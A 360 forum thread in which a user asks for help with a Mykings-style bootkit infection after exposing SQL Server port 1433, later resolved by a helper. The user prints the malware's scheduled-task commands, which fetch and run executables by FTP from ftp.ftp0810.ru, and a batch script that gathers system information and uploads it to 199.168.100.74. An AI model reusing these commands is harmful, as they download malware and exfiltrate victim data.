关闭

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城 | 社区客户端

推荐论坛版块活动众测商城更多内容
我自从安装sql2008外网就没有连接通过,1433开放后就被中毒,不晓得他到底要干啥,所有杀毒被屏蔽,只要打开连包含关键字的标题框也被关闭,
360所有软件被开机时全部干掉

先上图,这是任务计划

360社区

360社区

360社区

360社区

360社区

360社区

这是自动下载的木马

360社区

360社区

这是木马内部内容,懂的看一眼就会了

360社区

360社区

360社区

360社区

360社区

360社区

360社区

360社区





附件木马自己研究,找到开机启动下载木马的程序位置说一声,我难得装系统
temp-conhou.rar (13.59 KB)

共 7 个关于黑客 大佬都过来看看,这个木马怎么处理?的回复 最后回复于 2020-9-5 07:33

评论

直达楼层

我心好飞扬 LV2.下士 楼主 发表于 2020-8-29 21:49 | 显示全部楼层 | 私信
就看看有人出来处理没得?看看有大佬没得?,看看360工程师是不是自己的软件被干掉了这个问题都解决不了,期待解决
我心好飞扬 LV2.下士 楼主 发表于 2020-8-29 21:51 | 显示全部楼层 | 私信
再给你们说,这家伙就用了个upx3.9加的壳,还加了3次,呵呵
四海一叶秋 回复我心好飞扬:可能是Mykings病毒,Bootkit。还是建议别的电脑制作U盘急救盘,设置U盘启动扫描杀毒。或者系统下用急救箱强力模式扫描2-3遍,其余修复系统漏洞。 
2020-8-30 11:16回复
我心好飞扬 回复四海一叶秋:删除后就没有了,可以开机启动后又有了 
2020-8-29 22:13回复
我心好飞扬 回复四海一叶秋:不知道如何扫描 
2020-8-29 22:12回复
四海一叶秋 制作个急救盘启动扫描不就行了。或者安装硬盘版PE。 
2020-8-29 21:57回复
我心好飞扬 LV2.下士 楼主 发表于 2020-8-29 22:14 | 显示全部楼层 | 私信
MicrosoftsWindowsu    c:\windows\temp\conhou.exe


mysa   /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe

mysa2  /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

mysa3  /c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe

ok  rundll32.exe  c:\windows\debug\ok.dat,ServiceMain aaaa
我心好飞扬 LV2.下士 楼主 发表于 2020-8-29 22:26 | 显示全部楼层 | 私信
@echo off
SETLOCAL ENABLEDELAYEDEXPANSION
for /f %%a in ('wmic nicconfig where^(ipenabled^=true^) get index^|findstr [0-99]') do set i=%%a
for /f %%a in ('wmic nicconfig where^(index^=%i%^) get macaddress^|findstr [0-99]') do set a=%%a &set a=!a::=!
tasklist>"c:\windows\debug\%a%.txt"
ver>>"c:\windows\debug\%a%.txt"
whoami>>"c:\windows\debug\%a%.txt"
dir c:\windows\debug>>"c:\windows\debug\%a%.txt"
dir c:\windows\temp>>"c:\windows\debug\%a%.txt"
@echo off
echo open 199.168.100.74>ftp.up
echo up>>ftp.up
echo 1433>> ftp.up
Echo binary>>ftp.up
Echo put "c:\windows\debug\*.txt">> ftp.up
Echo bye>>ftp.up
FTP -s:ftp.up
del ftp.up /q
exit
我心好飞扬 这IP是美国的 IP地址: 199.168.100.74美国密苏里堪萨斯城 
2020-8-31 11:45回复
大眼睛大大_大 产品答疑师 发表于 2020-8-30 11:02 | 显示全部楼层 | 私信
您好,收到,我们先看下您提供的附件,进行分析,后续有结果和您反馈,谢谢
我心好飞扬 搞编程的一看就知道 
2020-9-3 20:25回复
我心好飞扬 弄出来没有啊,不会一个星期搞不定吧 
2020-9-3 20:25回复
我心好飞扬 LV2.下士 楼主 发表于 2020-9-1 19:55 | 显示全部楼层 | 私信
还没有解决啊,看来只有重装系统了
我心好飞扬 回复四海一叶秋:是的,要嘛格盘 
2020-9-3 20:20回复
四海一叶秋 重装系统不一定解决的了。 
2020-9-1 20:01回复
我心好飞扬 LV2.下士 楼主 发表于 2020-9-5 07:33 | 显示全部楼层 | 私信
感谢四海一叶秋帮组解决,果然是Bootkit病毒,并且清理了全盘蠕虫
您需要登录后才可以回帖 登录 | 注册

本版积分规则

我心好飞扬 LV2.下士

粉丝:0 关注:0 积分:59

精华:0 金币:109 经验:49

最后登录时间:2020-9-20

360商城青铜会员

私信 加好友

最新活动

活动

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

        关注360粉丝团,了解最新活动,抽锦鲤大奖,还有在线客服小姐姐等你来撩哦~

        快速回复 返回顶部 返回列表